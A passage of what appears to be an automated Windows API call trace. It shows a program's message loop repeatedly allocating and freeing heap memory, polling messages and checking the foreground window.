(HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.770] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.770] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.770] Sleep (dwMilliseconds=0x0) [0273.771] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.771] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.771] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.771] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.771] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.771] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.771] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.771] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.771] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.771] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.771] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.771] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.772] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.772] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.772] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.772] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.772] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.772] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.772] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.772] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.772] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.772] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.772] Sleep (dwMilliseconds=0x0) [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.775] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.775] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.775] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.775] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.775] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.775] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.775] Sleep (dwMilliseconds=0x0) [0273.851] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.852] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.852] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.852] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.852] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0273.852] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 0 [0273.852] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0273.852] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0273.852] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.852] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0273.852] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0273.852] DispatchMessageW (lpMsg=0x8dfb04) returned 0xffffffff [0273.852] GetForegroundWindow () returned 0xa0174 [0273.852] GetWindowLongW (hWnd=0xa0174, nIndex=-21) returned 3 [0273.852] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.852] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.852] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.852] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.852] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.852] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.852] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.852] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.852] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.853] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.853] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.853] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.853] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.853] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.853] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.853] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.853] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.853] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.853] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.853] Sleep (dwMilliseconds=0x0) [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.863] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.863] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.863] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.863] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.863] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.863] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.863] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.863] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.863] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.863] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.863] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.864] Sleep (dwMilliseconds=0x0) [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.864] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.864] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.864] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.864] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.864] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.864] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.865] Sleep (dwMilliseconds=0x0) [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.865] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.865] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.865] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.865] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.865] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.865] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.865] Sleep (dwMilliseconds=0x0) [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.866] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.866] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.866] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.866] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.866] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.866] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.867] Sleep (dwMilliseconds=0x0) [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.867] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.867] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.867] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.867] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.867] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.867] Sleep (dwMilliseconds=0x0) [0273.867] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.868] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.868] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.868] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.868] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.868] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.868] Sleep (dwMilliseconds=0x0) [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.868] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 